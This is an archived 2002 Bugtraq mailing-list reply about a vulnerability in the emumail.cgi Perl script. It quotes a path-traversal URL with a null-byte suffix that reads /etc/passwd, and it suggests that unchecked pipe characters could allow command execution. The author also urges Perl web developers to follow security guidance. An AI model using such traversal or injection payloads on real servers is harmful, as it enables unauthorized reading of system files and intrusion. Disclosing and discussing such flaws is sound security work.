[25011] in bugtraq
Re: emumail.cgi
daemon@ATHENA.MIT.EDU (Randal L. Schwartz)
Tue Apr 9 16:08:43 2002
To: "MegaHz" <admin@cyhackportal.com>
Cc: <bugtraq@securityfocus.com>, "N|ghtHawk" <nighthawk@hackers4hackers.nl>
From: merlyn@stonehenge.com (Randal L. Schwartz)
Date: 09 Apr 2002 12:14:17 -0700
In-Reply-To: <00e801c1dd68$11f2d9f0$0100a8c0@MEGAHZ>
Message-ID: <m1y9fwd6ra.fsf@halfdome.holdit.com>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
>>>>> "MegaHz" == MegaHz <admin@cyhackportal.com> writes:
MegaHz> u can also do this:
MegaHz> http://site/emumail.cgi?type=/../../../../../etc/passwd%00
MegaHz> but u cannot do this:
MegaHz> http://site/emumail.cgi?type=/../../../../../bin/ls%20/%00
It's Perl, so I bet they didn't check for pipe symbols at the
beginning and ending either. That can launch things.
I wish people who write Perl code for the net would at *least* read
the Perl Web Security FAQ *at a minimum*, or hire an outside Perl
company (like Stonehenge :) to vet the code.
--
Randal L. Schwartz - Stonehenge Consulting Services, Inc. - +1 503 777 0095
<merlyn@stonehenge.com> <URL:http://www.stonehenge.com/merlyn/>
Perl/Unix/security consulting, Technical writing, Comedy, etc. etc.
See PerlTraining.Stonehenge.com for onsite and open-enrollment Perl training!
